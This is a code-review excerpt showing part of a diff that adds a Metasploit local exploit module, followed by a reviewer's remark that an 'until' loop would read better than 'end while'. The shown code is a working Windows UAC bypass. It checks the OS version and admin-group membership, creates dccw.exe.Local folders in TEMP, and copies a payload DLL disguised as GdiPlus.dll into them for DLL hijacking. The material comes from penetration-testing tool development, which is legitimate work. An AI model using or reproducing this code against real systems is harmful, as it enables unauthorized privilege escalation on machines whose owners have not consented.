modules/exploits/windows/local/bypassuac_injection_winsxs.rb

```diff
@@ -0,0 +1,389 @@
+    end
+
+    if directoryNames.size > 1
+      copy_payload_dll(directoryNames, dllPath)
+    end
+  end
+
+  def copy_payload_dll(directoryNames, dllPath)
+    for i in 1 .. directoryNames.size - 1
+      if client.railgun.kernel32.CopyFileA(dllPath, "#{directoryNames[i]}\\GdiPlus.dll", false)['return'] == false
+        print_error("Error! Cannot copy the payload to all the necessary folders! Continuing just in case it works...")
+      end
+    end
+  end
+
+  def validate_environment!
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+
+    winver = sysinfo['OS']
+
+    case winver
+    when /Windows (8|2008|2012|10)/
+      print_good("#{winver} may be vulnerable.")
+    else
+      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
+    end
+
+    if is_uac_enabled?
+      print_status('UAC is Enabled, checking level...')
+    else
+      unless is_in_admin_group?
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+  end
+
+  # Creating the necessary directories to perform the DLL hijacking
+  # Since we don't know which path "dccw.exe" will choose, we create
+  # all the directories that match with the initial pattern
+  def create_directories(payload_filepath, directoryNames)
+    env_vars = get_envs('TEMP')
+
+    print_status("Creating temporary folders...")
+    if client.railgun.kernel32.CreateDirectoryA(payload_filepath, nil)['return'] == 0
+      fail_with(Failure::Unknown, "Cannot create the directory \"#{env_vars['TEMP']}dccw.exe.Local\"")
+    end
+
+    for i in 0 .. directoryNames.size - 1
+      if client.railgun.kernel32.CreateDirectoryA(directoryNames[i], nil)['return'] == 0
+        fail_with(Failure::Unknown, "Cannot create the directory \"#{env_vars['TEMP']}dccw.exe.Local\\#{directoryNames[i]}\"")
+      end
+    end
+  end
+
+  # Get all the directories that match with the initial pattern
+  def get_directories(payload_filepath, targetedDirectories)
+    directoryNames = []
+    findFileDataSize = 592
+    maxPath = client.railgun.const("MAX_PATH")
+    fileNamePadding = 44
+
+    hFile = client.railgun.kernel32.FindFirstFileA(targetedDirectories, findFileDataSize)
+    if hFile['return'] == client.railgun.const("INVALID_HANDLE_VALUE")
+      fail_with(Failure::Unknown, "Cannot get the targeted directories!")
+    end
+    findFileData = hFile['lpFindFileData']
+
+    begin
+      fileAttributes = findFileData[0, 4].unpack('V').first
+      andOperation = fileAttributes & client.railgun.const("FILE_ATTRIBUTE_DIRECTORY")
+      if andOperation
+        path = "#{payload_filepath}\\#{normalize_path(findFileData[fileNamePadding, fileNamePadding + maxPath])}"
+        directoryNames.push(path)
+    end
+
+    findNextFile = client.railgun.kernel32.FindNextFileA(hFile['return'], findFileDataSize)
+    findFileData = findNextFile['lpFindFileData']
+    end while findNextFile['return'] != false
```

Comment:
an `until` loop would be much cleaner here. Personally I abhor the end while syntax.